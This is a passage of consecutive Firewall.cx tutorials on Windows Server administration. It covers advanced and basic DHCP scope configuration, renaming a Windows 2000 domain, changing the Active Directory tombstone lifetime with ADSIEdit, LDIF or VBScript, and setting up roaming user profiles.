2. Scroll down to option 006 DNS Servers and place a checkmark in its box. This will activate the Data Entry section. In that section, type 192.168.0.252 for the IP Address and click Add. Then enter 192.168.1.252 as another IP Address and click Add again. This will add those two servers as DNS servers.

3. Scroll down to option 015 DNS Domain Name and place a checkmark in its box. This will activate the Data Entry section. In that section, enter firewall.cx in the String Value text field.

4. Scroll down to option 044 WINS/NBNS Servers and place a checkmark in its box. This will activate the Data Entry section. In that section, enter 192.168.0.251 for the IP Address and click Add. Then enter 192.168.1.251 as another IP Address and click Add again. This will add those two servers as WINS servers.

5. Scroll down to option 046 WINS/NBT Node Type and place a checkmark in its box to activate the Data Entry section. In that section, enter “0x8” in the Byte text field and click OK . This will set the workstation node type to 'Hybrid', which is preferred.

Back on the DHCP MMC, if you click on the Server Options node you will see the following:

tk-windows-dhcp-2k3-advanced-3

Subsequent scopes will inherit these options if no scope options are specified. However, if scope options are specified then the scope options would override the server options in assignment.
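
For reference, on Windows Server 2012 and later the same server-level options can be set with the DhcpServer PowerShell module; the sketch below mirrors steps 2-5 above and is not applicable to Server 2003 itself.

    # Sketch (Windows Server 2012+ DhcpServer module): server-wide option values
    # equivalent to those configured through the MMC above.
    Set-DhcpServerv4OptionValue -DnsServer 192.168.0.252, 192.168.1.252 -DnsDomain 'firewall.cx' -WinsServer 192.168.0.251, 192.168.1.251

    # Option 046 (WINS/NBT node type) can be set through the generic
    # -OptionId/-Value parameter set of the same cmdlet if required.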

If we did have Cisco IP phones in our environment we would define Option 150 as follows:

1. Right-click the server node on the DHCP MMC and choose Set Predefined Options

2. When the Predefined Options and Values window comes up, click Add

3. When the Options Type window comes up, type a name for the option such as “TFTP Server for Cisco IP Phones”.

4. On the Data Type drop-down menu, select IP Address.

5. On the Code text field, enter 150.

6. On the Description text field, type a description for the option, such as “Used by Cisco IP Phones”.

7. Check the box next to Array

8. Click OK twice.

If you go back to the Scope/Server Options window again, you will see Option 150 available.

tk-windows-dhcp-2k3-advanced-4

Dynamic DNS

At this point, our imaginary network can service a significant number of clients, but those clients can only be referenced by IP address. Sometimes it is necessary or helpful to reference clients by their host names rather than IP addresses.

DNS resolves client host names to IP addresses. But for DNS to be able to do that, client host names and IP addresses must already be registered in DNS. Servers are typically registered manually in DNS by the administrator, but workstations are not. So how do client workstations get registered in DNS? The answer is to use dynamic DNS (DDNS), a feature that will allow clients, or the DHCP server itself, to register clients in DNS automatically upon the client's assignment of an IP address. Fortunately, DDNS is setup to automatically work in a domain environment, granted that DNS is also setup correctly in the network.

To view the options available for DDNS:

  1. On the DHCP MMC, right-click the server node and choose Properties
  2. When the Properties window comes up, click the DNS tab.

If the network has some clients that are not in the domain, have legacy Windows operating systems, or are not capable of registering their host names and IP addresses in DNS, the two options marked below would need to be selected:

tk-windows-dhcp-2k3-advanced-5

But if that were the case, you would also have to specify credentials that the DHCP server would use for DDNS on behalf of the clients. To do this, you would:

  1. Click the Advanced tab on the Properties window.

tk-windows-dhcp-2k3-advanced-6

 

2. Click the Credentials button.

3. When the DNS Dynamic Update Credentials window comes up, enter an administrator username and password for the domain (in our example, firewall.cx). In a real-world environment, you would create a separate username and password used solely for DDNS and enter it here instead.

4. Click OK twice to exit the Properties window.

Superscopes

Let us imagine that the number of client workstations in Floor 1 of Building A was expanded beyond the number of available IP addresses that our “Building A, Floor 1” scope could offer. What would we do to provide IP addresses to those additional clients?

The following options may appear to be solutions, but they are not always feasible:

  1. Extend the scope to include more IP addresses.
  2. Create an additional scope for that network segment.
  3. Delete and recreate the scope with a different subnet mask that allows for more hosts.

The problem with the first option is that you may not always be able to extend the scope, depending on the scope's subnet mask and whether consecutive scopes were created based on that subnetting. The problem with the second option is that even if you create an additional scope, the DHCP server would not automatically lease out those IP addresses to clients of that physical network segment. Although the third option could work, it may not always be optimal depending on how many additional network-based changes would also be needed to reach the solution.

There are a few options to solve this issue:

  1. Place the additional clients in a separate VLAN and create a scope for that VLAN that is in a completely different network
  2. Create a superscope that includes the exhausted scope and a new scope with available IP addresses

The first option could solve the problem but, since this is a DHCP article, we will address the problem by using DHCP features, so the second option will be our choice!

Superscopes allow you to join scopes from separate networks into one scope. Then, when one of the scopes runs out of IP addresses, the DHCP server would automatically start leasing out IP addresses from the other scopes in that superscope. However, solely creating a superscope is not the complete solution. As some clients in that network segment would have IP addresses from a different network, the segment's router interface would also have to be assigned an additional IP address that is in the same network as the additional scope.

To use this solution, we first have to create the additional scope. Here are the scope specifications:

tk-windows-dhcp-2k3-advanced-7

The scope will inherit the server options for DNS domain name, DNS server and WINS server. Activate the scope when done.

Now we will create a superscope and place the two Building A scopes in it:

  1. On the DHCP MMC, right-click the server node and choose New Superscope
  2. When the New Superscope Wizard comes up, click Next
  3. On the next screen, you are prompted to enter a name for the superscope. Enter “All of Building A, Floor 1” and click Next
  4. On the next screen, you are asked to select the scopes that will be part of the superscope. Select the scopes shown below and then click Next

tk-windows-dhcp-2k3-advanced-8

 

5. On the next screen, click Finish to complete the wizard.

Back on the DHCP MMC, you will see that the two scopes selected earlier have been placed under a new superscope – “Superscope All of Building A, Floor 1”.

tk-windows-dhcp-2k3-advanced-9

 

Now when the scope titled “Building A, Floor 1” runs out of IP addresses, the server will start issuing IP addresses in “Building A, Floor 1 – Extended”.

Multicast Scopes

The most common systems and applications that use multicasting have multicast IP addresses statically configured or hard-coded in some way. However, for systems and applications that need multicast IP addresses dynamically assigned, they lease them from a MADCAP (Multicast Address Dynamic Client Allocation Protocol) server, such as Windows Server 2003.

One example of such an application is Phone Dialer, an old application from Windows 2000 that leased a multicast IP address from a MADCAP server. This application allowed the creation of video conferences that people could attend. When creating a conference, the application would lease a multicast IP address from the MADCAP server and stream to that IP address. Clients wishing to join the conference would “join” that established multicast group.

Setting up a multicast scope is similar to setting up a standard scope:

  1. On the DHCP MMC, right-click the server node and choose New Multicast Scope
  2. When the New Multicast Scope Wizard comes up, click Next
  3. On the next screen, specify a Scope Name of “Video Conferencing” and a Scope Description of “Multicast scope for conference presenters.” Afterwards, click Next

tk-windows-dhcp-2k3-advanced-10

4. On the next screen, enter 239.192.1.0 in the Start IP Address field and 239.192.1.255 in the End IP Address field. Since this scope will only service video conferences within the company, we define an IP address range in the multicast organization local scope range. Leave the TTL at 32. Click Next when done.

 

tk-windows-dhcp-2k3-advanced-11

  5. On the next screen, click Next again. No exclusions need to be defined.
  6. On the next screen, set the Days to 1 and click Next
  7. On the next screen, click Next to activate the scope.
  8. On the next screen, click Finish
  9. Back on the DHCP MMC, expand the multicast scope that we just created and select Address Pool . Notice that an exclusion range encompassing the entire pool is also created. Select it and delete it.

The DHCP server can now provide multicast IP addresses. For the most part, the multicast scope functions the same as a standard scope. One different feature is that you can set a multicast scope to automatically expire and delete itself at a certain time.

To configure this:

  1. Right-click the multicast scope and choose Properties
  2. When the Properties window comes up, click the Lifetime tab.
  3. On the Lifetime tab, select “Multicast scope expires on” and select when you would like it to expire. When this date and time is reached, the server automatically deletes the scope.

Conclusion

The Advanced DHCP configuration article continues with part 2, covering the DHCP database backup and restoration, troubleshooting the DHCP service using audit logs and finally DHCP Migration.

To continue with our article, please click here: Windows 2003 Advanced DHCP Server Configuration - Part 2.


Windows 2003 DHCP Server Installation & Configuration

DHCP (Dynamic Host Configuration Protocol) is a protocol that allows clients on a network to request network configuration settings from a server running the DHCP server service which, in our case, will be Windows Server 2003. Additionally the protocol allows the clients to self-configure those network configuration settings without the intervention of an administrator. Some of the settings that a DHCP server can provide to its clients include the IP addresses for the DNS servers, the IP addresses for the WINS servers, the IP address for the default gateway (usually a router) and, of course, an IP address for the client itself.

This article will discuss and walk you through the steps of installing and configuring DHCP on a Windows Server 2003 member server, specifically focusing on setting up a scope and its accompanying settings. The same configuration can be applied to a standalone server even though the step-by-step details differ slightly. The upcoming 'Advanced DHCP Server Configuration on Windows 2003' article will discuss other DHCP options and features such as superscopes, multicast scopes, dynamic DNS, DHCP Backup and more.

While our articles make use of specific IP addresses and network settings, you can change these settings as needed to make them compatible with your LAN – This won't require you to make changes to your LAN, but you'll need to have a slightly stronger understanding of DHCP and TCP/IP.

Assigning the Server a Static IP Address

Before we install the DHCP server service on Windows Server 2003, we need to assign the Windows server a static IP address. To do this:

1. Go to Start > Control Panel > Network Connections , right-click Local Area Connection and choose Properties .

2.  When the Local Area Connection Properties window comes up, select Internet Protocol (TCP/IP) and click the Properties button.

3.  When the Internet Protocol (TCP/IP) window comes up, enter an IP address , subnet mask and default gateway IP address that is compatible with your LAN.

We've configured our settings according to our network, as shown below:

tk-windows-dhcp-2k3-basic-1

4. Enter 192.168.0.252 for the Preferred DNS server and 192.168.1.252 for the Alternate DNS server. The Preferred and Alternate DNS server IP addresses are optional for the functionality of the DHCP server, but we will populate them since you typically would in a real-world network. Usually these fields are populated with the IP addresses of your Active Directory domain controllers.

5. After filling out those fields, click OK and OK to save and close all windows.
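
The same addressing can also be applied from the command line with netsh, which is built into Windows Server 2003. The sketch below is shown as it would be run from a PowerShell window (the netsh commands themselves work identically from a classic command prompt); the connection name "Local Area Connection", the server address 192.168.0.253 and the gateway are assumptions based on the examples used in this series, so adjust them to your own LAN.

    # Sketch: set the static address and DNS servers with netsh instead of the GUI.
    # Adjust the connection name and addresses to match your own environment.
    netsh interface ip set address name="Local Area Connection" source=static addr=192.168.0.253 mask=255.255.255.0 gateway=192.168.0.254 gwmetric=1
    netsh interface ip set dns name="Local Area Connection" source=static addr=192.168.0.252
    netsh interface ip add dns name="Local Area Connection" addr=192.168.1.252 index=2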

Install DHCP Server Service on Windows Server 2003

Our server now has a static IP address and we are now ready to install the DHCP server service. To do this:

1. Go to Start > Control Panel > Add or Remove Programs .

2. When the Add or Remove Programs window launches, click Add/Remove Windows Components in the left pane.

3. When the Windows Components Wizard comes up, scroll down and highlight Networking Services and then click the Details button.

tk-windows-dhcp-2k3-basic-2

4. When the Networking Services window comes up, place a check mark next to Dynamic Host Configuration Protocol (DHCP) and click OK and OK again.

tk-windows-dhcp-2k3-basic-3

Note that, during the install, Windows may generate an error claiming that it could not find a file needed for DHCP installation. If this happens, insert your Windows Server 2003 CD into the server's CD-ROM drive and browse to the i386 directory. The wizard should automatically find the file and allow you to select it. After that, the wizard should resume the installation process.

Configure DHCP on Windows Server 2003

DHCP has now been successfully installed and we are ready to configure it. We will create a new scope and configure some of the scope's options. To begin:

1. Launch the DHCP MMC by going to Start > Administrative Tools > DHCP .

Currently, the DHCP MMC looks empty and the server node in the left pane has a red arrow pointing down. Keep that in mind because it will be significant later on.

tk-windows-dhcp-2k3-basic-4

2. Right-click the server node in the left pane and choose New Scope . This will launch the New Scope Wizard.

3. On the New Scope Wizard, click Next .

4. Specify a scope name and scope description. For the scope Name , enter “ Building A, Floor 1 .” For the scope Description , enter “ This scope is for Floor 1 of Building A .” Afterwards, click Next .

tk-windows-dhcp-2k3-basic-5

The scope name can be anything, but we certainly want to name it something that describes the scope's purpose. The scope Description is not required. It is there in case we needed to provide a broader description of the scope.

5. Specify an IP address range and subnet mask. For the Start IP address enter 192.168.0.1, for the End IP address enter 192.168.0.254 . Finally, specify a subnet mask of 255.255.255.0 and click Next.

Specifying the IP address range of a scope requires some knowledge of subnetting. Each scope in a DHCP server holds a pool of IP addresses to give out to clients, and the range of IP addresses must be within the allowed range of the subnet (that you specify on the subnet mask field).

For simplicity we entered a classful, class C IP address range from 192.168.0.1 to 192.168.0.254. Notice that the range encompasses the IP address of our server, the DNS servers and the default gateway, meaning that the DHCP server could potentially assign a client an IP address that is already in use! Do not worry -- we will take care of that later.

tk-windows-dhcp-2k3-basic-6

 

6. Specify IP addresses to exclude from assignment. For the Start IP address , enter 192.168.0.240 and for the End IP address enter 192.168.0.254 , click Add , and then click Next.

tk-windows-dhcp-2k3-basic-7

 

Certain network devices, such as servers, will need statically configured IP addresses. The IP addresses may sometimes be within the range of IP addresses defined for a scope. In those cases, you have to exclude the IP addresses from being assigned out by DHCP.

We have the opportunity here to define those IP addresses that are to be excluded. We specified IP addresses 192.168.0.240 to 192.168.0.254 to ensure we've included our servers plus a few spare IP addresses for future use.

7. Specify the lease duration for the scope. Verify that Days is 8 and click Next.

The lease duration is how long clients should keep their IP addresses before having to renew them.

tk-windows-dhcp-2k3-basic-8

There are a few considerations at this point. If a short lease duration is configured, clients will be renewing their IP addresses more frequently. The result will be additional network traffic and additional strain on the DHCP server. On the other hand if a long lease duration is configured, IP addresses previously obtained by decommissioned clients would remain leased and unavailable to future clients until the leases either expire or are manually deleted.

Additionally if network changes occur, such as the implementation of a new DNS server, those clients would not receive those updates until their leases expire or the computers are restarted.

As Microsoft states, “lease durations should typically be equal to the average time the computer is connected to the same physical network.” You would typically leave the default lease duration in an environment where computers are rarely moved or replaced, such as a wired network. In an environment where computers are often moved and replaced, such as a wireless network, you would want to specify a short duration since a new wireless client could roam within range at any time.

8. Configure DHCP Options. Make sure “ Yes, I want to configure these settings now ” is selected and click Next to begin configuring DHCP options.

DHCP options are additional settings that the DHCP server can provide to clients when it issues them with IP addresses. These are the other settings that help clients communicate on the network. In the New Scope Wizard we can only configure a few options but from the DHCP MMC we have several more options.

9. Specify the router IP address. Enter 192.168.0.254 as the IP address of the subnet's router, click Add , and then click Next .

The first option we can configure is the IP address for the subnet's router for which this scope is providing IP addresses. Keep in mind that this IP address must be in the same network as the IP addresses in the range that we created earlier.

tk-windows-dhcp-2k3-basic-9

 

10. Configure domain name and DNS servers. On the next page, enter “firewall.cx" for the domain name. Then enter 192.168.0.252 for the IP address of a DNS server, click Add , enter 192.168.1.252 as the IP address for another DNS server, and click Add again. When finished, click Next.

If you had a DNS infrastructure in place, you could have simply typed in the fully qualified domain name of the DNS server and clicked Resolve .

The DNS servers will be used by clients primarily for name resolution, but also for other purposes that are beyond the scope of this article. The DNS domain name will be used by clients when registering their hostnames to the DNS zones on the DNS servers (covered in the 'Advanced DHCP Server Configuration on Windows 2003' article).

tk-windows-dhcp-2k3-basic-10

 

11. Configure WINS servers. On the next screen, enter 192.168.0.251 as the IP address for the first WINS server, click Add , enter 192.168.1.251 as the IP address for the second WINS server, click Add again, and then click Finish .

tk-windows-dhcp-2k3-basic-11

 

12. Finally, the wizard asks whether you want to activate the scope. For now, choose “ No, I will activate this scope later ” and click Next and then Finish to conclude the New Scope Wizard and return to the DHCP MMC.

At this point we almost have a functional DHCP server. Let us go ahead and expand the scope node in the left pane of the DHCP MMC to see the new available nodes:

•  Address Pool – Shows the IP address range the scope offers along with any IP address exclusions.

•  Address Leases – Shows all the leased IP addresses.

•  Reservations – Shows the IP addresses that are reserved. Reservations are made by specifying the MAC address that the server would “listen to” when IP address requests are received by the server. Certain network devices, such as networked printers, are best configured with reserved IP addresses rather than static IP addresses.

•  Scope Options – Shows configured scope options. Some of the visible options now are router, DNS, domain name and WINS options.

•  Server Options – Shows configured server options. This is similar to scope options except that these options are either inherited by all the scopes or overridden by them (covered in 'Advanced DHCP Server Configuration on Windows 2003' article).

Earlier, we only defined exclusions for our servers, router plus a few more spare IP addresses. In case you need to exclude more IP addresses, you can do it at this point by following these instructions:

13. Select and right-click Address Pool and choose New Exclusion Range.

14. When the Add Exclusion window comes up, enter the required range and then click Add. In our example, we've excluded the additional range 192.168.0.230 - 192.168.0.232.

tk-windows-dhcp-2k3-basic-12

Notice that the server node and scope node still have red arrows pointing down. These red arrows mean that the server and scope are not “turned on”.

The concept of “turning on” the scope is called “activating” and the concept of “turning on” the server for DHCP service is called “authorizing”. Security has some influence in the concept of authorizing a DHCP server and, to authorize a DHCP server, you must be a member of the Enterprise Admins Active Directory group.

15. Right-click the server (server001.firewall.cx) and choose Authorize , then right-click the scope (Building A, Floor 1) and choose Activate . If the red arrows remain, refresh the MMC by going to Action > Refresh .

tk-windows-dhcp-2k3-basic-13

Congratulations! At this point, you should have a working DHCP server capable of providing IP addresses!
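
For completeness, the whole walk-through above can be scripted on Windows Server 2012 and later with the DhcpServer PowerShell module. The sketch below mirrors the scope, exclusion, option, authorization and activation steps, and does not apply to Server 2003 itself.

    # Sketch (Windows Server 2012+ DhcpServer module): the "Building A, Floor 1"
    # scope built above, scripted end to end.
    Add-DhcpServerv4Scope -Name 'Building A, Floor 1' -StartRange 192.168.0.1 -EndRange 192.168.0.254 -SubnetMask 255.255.255.0 -LeaseDuration (New-TimeSpan -Days 8) -State InActive
    Add-DhcpServerv4ExclusionRange -ScopeId 192.168.0.0 -StartRange 192.168.0.240 -EndRange 192.168.0.254
    Set-DhcpServerv4OptionValue -ScopeId 192.168.0.0 -Router 192.168.0.254 -DnsServer 192.168.0.252, 192.168.1.252 -DnsDomain 'firewall.cx' -WinsServer 192.168.0.251, 192.168.1.251
    Add-DhcpServerInDC                                   # authorize this DHCP server in Active Directory
    Set-DhcpServerv4Scope -ScopeId 192.168.0.0 -State Active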


Renaming Windows 2000 Domain Name

Sometimes renaming a domain is an essential business requirement. There are many situations, such as mergers, change of company name or migration from a test environment to a production environment, that require you to change the existing domain name.

However, changing a domain name in Windows Server 2000 is not a simple or straightforward process. It is a time consuming and complex procedure, which requires extensive work.

The renaming of a Windows 2000 domain may impact other server applications that are running in the domain, such as Exchange Server and other custom applications that are closely integrated with Active Directory and use hard coded NETBIOS names.

The major task in renaming a domain is to revert the Windows Server 2000 to Windows NT and then upgrade it to Windows Server 2000 with a new DNS (FQDN) name. If there is more than one domain controller in the domain then all the Windows 2000 domain controllers must be demoted to member servers before renaming the desired domain controller.

Requirements

Renaming a Windows 2000 domain is only possible if the functional level of the domain is set to mixed mode. Windows 2000 mixed mode means that Windows NT 4.0 BDCs are permitted in the domain/forest. The domain must be in mixed mode because an NT 4.0 BDC is needed to complete the renaming procedure.

Note: If the default functional level of the domain is set to native mode, you cannot revert to mixed mode and cannot rename the domain.

If you have one or more child domains, you have to downgrade all the child domains to Windows NT before downgrading the parent domain. You then need to upgrade the parent domain with the new FQDN and subsequently upgrade the child domain(s).

Steps To Be Taken

To rename a Windows 2000 domain, you need to follow these steps:

1. Verify that at least one Windows NT 4.0 BDC, having Service Pack 6 or 6a installed on it, exists in the domain.

2. Backup all the domain controllers in the domain.

3. If required, install another Windows NT 4.0 BDC in the domain and force replication to ensure that the backup of all the security information, domain user accounts and SAM database exists. You can use net accounts /sync command on the Windows NT 4.0 BDC to force replication.

4. If you have just one domain controller, simply isolate it from the network by removing all the cables.

If you have more than one domain controller, you need to demote all the Windows 2000 domain controllers to member servers, leaving just one Windows 2000 domain controller, by using dcpromo command.

Then isolate the last Windows 2000 domain controller after ensuring that a Windows NT 4.0 BDC is present on the network.

5. Demote the last Windows 2000 domain controller by using the dcpromo command, ensuring that the option indicating this is the last domain controller in the domain is selected.

Note: To run dcpromo command on the last Windows 2000 domain controller, connect it to an isolated active hub because dcpromo command requires an active connection.

6. Promote Windows NT BDC to a PDC and then upgrade it to Windows 2000.

7. Provide the desired domain name at the time of Active Directory installation.

8. Promote all the demoted member servers back to Windows 2000 domain controllers by running dcpromo on them.

Article Summary

In this article we have seen the different scenarios and methods of renaming a Windows 2000 domain. We have learnt that renaming a Windows 2000 domain is a fairly complex process. We must keep in mind that changing domain name in Windows 2000 should not be performed unless it is absolutely necessary.

Careful planning while deciding on the FQDN/DNS name of the Windows 2000 domain at the time of installation can avoid the trouble of renaming a Windows 2000 domain.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

  • Hits: 21779

Active Directory Tombstone Lifetime Modification

A tombstone is what remains of an object after it has been deleted from Active Directory. When an object is deleted, it is not physically removed from Active Directory for some time. Instead, Active Directory sets the 'isDeleted' attribute of the deleted object to TRUE and moves it to a special hidden container, CN=Deleted Objects, where it is kept as a tombstone.

Tombstones cannot be accessed through Windows Explorer or through the standard Microsoft Management Console (MMC) snap-ins. However, tombstones are visible to the directory replication process, so they are replicated to all the domain controllers in the domain. This ensures that the deletion is propagated to every domain controller throughout Active Directory.

The tombstone lifetime attribute defines the time period after which a tombstone is physically deleted from Active Directory. The default value for the tombstone lifetime attribute is 60 days; however, you can change this value if required. The tombstone lifetime is usually kept longer than the expected replication latency between the domain controllers, so that a tombstone is not deleted before the deletion has replicated across the forest.


The tombstone lifetime value is the same on all the domain controllers, and a tombstone is removed from all of them at the same time. This is because the expiration of a tombstone is based on the time the object was logically deleted from Active Directory, rather than the time it was received as a tombstone on a server through replication.

Changing Tombstone Lifetime Attribute

The tombstone lifetime attribute can be modified in three ways: using the ADSIEdit tool, using an LDIF file, or through a VBScript.

Using ADSIEdit Tool

The easiest method to modify the tombstone lifetime in Active Directory is by using ADSIEdit. The ADSIEdit tool is not installed automatically when you install Windows Server 2003; you need to install it separately as part of the Support Tools from the Windows Server 2003 CD.
If you haven't got your CDs at hand, you can simply download the Windows 2003 SP1 Support Tools from Firewall.cx here.
To install the ADSIEdit tool and modify the tombstone lifetime in Active Directory using this tool, you need to:

  1. Insert the Windows Server 2003 CD.
  2. Browse the CD to locate the Support\Tools directory.
  3. Double-click the suptools.msi to proceed with the installation of support tools.
  4. Select Run command from the Start menu.
  5. Type ADSIEdit.msc to open the ADSI Editor, as shown below:

tk-windows-tombstone-1

The ADSI Edit window appears:
tk-windows-tombstone-2

6. Expand the Configuration node and then expand the CN=Configuration,DC=Firewall,DC=cx node.
7. Expand the CN=Services node.
8. Drill down to CN=Directory Service under CN=Windows NT, as shown in the figure below:
tk-windows-tombstone-3

9. Right-click CN=Directory Service and select Properties from the menu that appears
The CN=Directory Service Properties window appears, as shown below:
10. Double-click the tombstoneLifetime attribute in the Attributes list.
tk-windows-tombstone-4

The Integer Attribute Editor window appears, as shown below:
tk-windows-tombstone-5

11. Set the number of days that tombstone objects should remain in Active Directory in the Value field.
12. Click OK .
The Tombstone Lifetime has now been successfully changed.

Other Ways Of Changing The Tombstone Lifetime Attribute

Using an LDIF file

To change the tombstone lifetime attribute using an LDIF file, you need to create the file in Notepad and then execute it using the LDIFDE tool. To do this:
1. Create a text file in Notepad with the following content:

dn: cn=Directory Service,cn=Windows NT,cn=Services,cn=Configuration,<ForestRootDN>
changetype: modify
replace: tombstoneLifetime
tombstoneLifetime: <NumberOfDays>
-

2. Provide the appropriate values for the placeholders between < >. For example, put the distinguished name of your Active Directory forest root domain (e.g. DC=Firewall,DC=cx) in place of <ForestRootDN>, and the number of days you want to set for the tombstone lifetime in place of <NumberOfDays>.

3. Don't forget to put "-" on the last line.

4. Save the file with .ldf extension.

5. Open a Command Prompt and type the following command:

c:\> ldifde -i -v -f <Path to tombstoneLifetime.ldf>

The tombstone lifetime has now been successfully changed.

Using a VBScript

To change tombstone lifetime using VBScript, you need to type the following code with appropriate values and execute the script.

intTombstoneLifetime = <NumberOfDays>
Set objRootDSE = GetObject("LDAP://RootDSE")
Set objDSCont = GetObject("LDAP://cn=Directory Service,cn=Windows NT," & _
    "cn=Services," & objRootDSE.Get("configurationNamingContext"))
objDSCont.Put "tombstoneLifetime", intTombstoneLifetime
objDSCont.SetInfo
WScript.Echo "The tombstone lifetime is set to " & intTombstoneLifetime
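Whichever method you use, you can verify the new value afterwards with the dsquery tool included with Windows Server 2003. A quick check, assuming the same forest root used in the screenshots above (DC=Firewall,DC=cx):

C:\> dsquery * "cn=Directory Service,cn=Windows NT,cn=Services,cn=Configuration,DC=Firewall,DC=cx" -scope base -attr tombstoneLifetime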

Article Summary

This article explained what Active Directory tombstones are and how you can change the tombstone lifetime attribute to control when deleted objects are finally purged from Active Directory. We covered three different methods in enough detail for any Windows administrator to carry out the change.

  • Hits: 54243

Configuring Windows Server Roaming Profiles

Windows roaming profiles allow the mobile users of a company to always work with their personal settings from any network computer in a domain. Roaming profiles are a collection of personal user settings of a user, saved at a central location on a network.

These settings and configurations are loaded on any network computer as soon as the user logs in with their credentials.

The roaming user profiles functionality is very useful because it allows mobile users to log on to a variety of computers located at different places and get the same look and feel of their own personalized desktops. However, roaming user profiles in Windows Server 2003 do not allow you to use encrypted files.

A roaming profile is made up of the folders that appear under the <username> folder in Documents and Settings, as shown below:

tk-windows-roaming-profiles-1

The detailed description of each folder is as follows:

  • Desktop: This folder contains all the files, folders, and shortcuts data that is responsible for the appearance of your desktop screen.
  • Favorites: This folder contains the shortcuts of the favorite and frequently visited websites of the user.
  • Local Settings: This folder contains temporary files, history, and the application data.
  • My Documents: This folder contains documents, music, pictures, and other items.
  • Recent: This folder contains shortcuts to the files and folders most recently accessed by the user.
  • Start Menu: This folder contains the Start menu items.
  • Cookies: This folder contains all cookies stored on the user's computer.
  • NetHood: This folder contains shortcuts to sites in My Network Places .
  • PrintHood: This folder contains the shortcuts of printers configured for the user's computer.
  • Application Data: This folder contains the program-specific and the security settings of the applications that the user has used.
  • Templates: This folder contains the templates for applications such as Microsoft Word and Excel.
  • SendTo: This folder contains the destinations that appear in the Send To menu when right-clicking a file.

Creating Roaming User Profiles

You can create roaming user profiles on Windows NT Server 4.0, Windows 2000 Server, or Windows Server 2003 based computers. In addition, you can use Windows NT Workstation 4.0, Windows XP Professional, or Windows 2000 Professional based computer that is running Windows NT Server Administration Tools to create roaming user profiles.

The three major steps involved in creating a roaming user profile are: creating a temporary user profile on a local computer, copying that profile to a network server, and then defining the user's profile location in the user account's properties.

To create a roaming user profile, follow the steps given below:

1. Log on as Administrator, or as a member of the local Administrators group or of the Account Operators group in the domain:

tk-windows-roaming-profiles-2

 

2. Open Administrative Tools in the Control Panel and then click Computer Management, as shown above.

3. Click the Users folder under the Local Users and Groups node, right-click Users and then click New User in the menu that appears, as shown below:

Note: If you are using Active Directory, click the Users folder under the Active Directory Users and Computers node instead.

tk-windows-roaming-profiles-3

The New User dialog box appears as shown below.

 

4. Provide the User logon name and the Password for the user for whom the roaming profile is being created in their respective fields. Click on Next:

tk-windows-roaming-profiles-4

 

5. Enter the user password and clear the User must change password at next logon option as shown below:

tk-windows-roaming-profiles-4a

 

6. Click Create , click Close, and then quit the Computer Management snap-in.

7. Log off the computer and then Log on to your workstation using the user account that you have just created on your server.

8. Verify that a folder with the user name is created under the Documents and Settings folder, as shown below:

tk-windows-roaming-profiles-5

9. Configure your desktop by adding shortcuts and modifying its appearance.

10. Configure the Start menu by adding desired options to it.

11. Log off.

Copying The Profile To Your Server

A temporary profile with all the required settings is configured on your local computer. You need to now copy this local profile to a network server which can be accessed centrally by all the computers.

Try not to use a domain controller for this purpose; domain controllers have plenty of other tasks to do, so it is better to keep them out of this role. Instead, choose a member server. Make sure that the member server you choose is regularly backed up, otherwise you may lose all your roaming profiles.

To copy the profile to a network server, you need to:

1. Log on as Administrator and then create a Profiles folder on a network server.

Roaming user profiles are traditionally stored in a folder named Profiles, although you can give the folder a different name if you wish.

2. Share the Profiles folder and give Everyone Full Control at the share level (a command-line example is shown below).
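If you prefer the command line, the folder can be created and shared in one step from the server's command prompt. A minimal sketch, assuming the folder lives on drive D: (the path is an example only); if your Windows version does not support the /GRANT switch, share the folder and set the permissions through the GUI instead:

C:\> mkdir D:\Profiles
C:\> net share Profiles=D:\Profiles /GRANT:Everyone,FULL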

3. Open Control Panel , and then click System icon. The System Properties dialog box appears.

4. Click Advanced tab, and then click Settings under User Profiles section, as shown below:

tk-windows-roaming-profiles-6

 The User Profiles dialog box appears.

 

5. Click the temporary user profile that you had created and then click Copy To, as shown in the Figure below:

tk-windows-roaming-profiles-7

 

Next, the Copy To dialog box appears, as shown below.

6. Type the network path of the Profile folder in the Copy Profile To field.

A folder with the temporary user name will be created automatically under the Profiles folder.

7. Click Change.

tk-windows-roaming-profiles-8

 

8. The Select User or Group dialog box appears.

9. Enter the name of the temporary user that you have created.

10. Click OK four times on all the windows that you have opened recently.

11. Open Administrative Tools in the Control Panel and then click Computer Management, as shown in the second screenshot in this article.

12. Click Users folder under Local Users and Groups node, as shown below:

13. Double-click the temporary user account that you had created.

14. The Properties window for the user account appears as shown in the figure below.

15. Click the Profile tab and then type the path of Profile folder that you had created on a network server in the Profile path field:

tk-windows-roaming-profiles-9

 

16. Click OK and then quit the Computer Management snap-in.

This completes the process of creating a roaming user profile. Now when the user logs into any computer in the domain using his/her credentials, a copy of the user profile stored on the network will be copied to that computer with all the latest changes that the user might have made.
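If you prefer the command line, the same profile path can also be set on the server with the net user command. A sketch, assuming a hypothetical file server named FILESRV and a user named jsmith (add /domain when modifying a domain account):

C:\> net user jsmith /profilepath:\\FILESRV\Profiles\jsmith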

Usually, when a number of roaming profiles are enabled in a domain, logging on and off can become extremely slow. This happens mostly when roaming users save large files in their profiles: each time a user logs off, or logs on to a different computer, the large files take a long time to be copied to and from the network.

The solution to this problem is to use Folder Redirection along with roaming user profiles. The Folder Redirection feature allows you to redirect folders such as Application Data, Desktop, My Documents, and Start Menu to a different network location. These folders are typically where the large files are saved. When Folder Redirection is used, Windows understands that those particular folders need not be copied each time a roaming user logs on or off; they are only accessed when the user actually opens a file from them.

Another way to control the growing size of user profiles is to create Mandatory User Profiles. Such profiles are appropriate when you want to provide identical desktop configurations to all the roaming users. When mandatory user profiles are configured, users are not allowed to save changes to their profile settings, and thus the profile size always remains manageable. To make a roaming user profile mandatory, rename the Ntuser.dat file to Ntuser.man in the user's profile folder, as shown in the example below.
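For example, assuming the same hypothetical server and user as above, the rename can be performed from a command prompt (Ntuser.dat is a hidden file, so use dir /a if you cannot see it):

C:\> ren "\\FILESRV\Profiles\jsmith\Ntuser.dat" Ntuser.man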

Article Summary

Roaming user profiles are simply collections of settings and configurations that are stored on a network location for each user. Once you perform some fairly simple configurations, every time a user logs on to a machine in your domain with his domain credentials, that user's settings will follow him and automatically be applied to his log-on session for that particular machine.

This article covered the creation of roaming user profiles in a Windows server active directory.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

  • Hits: 47744

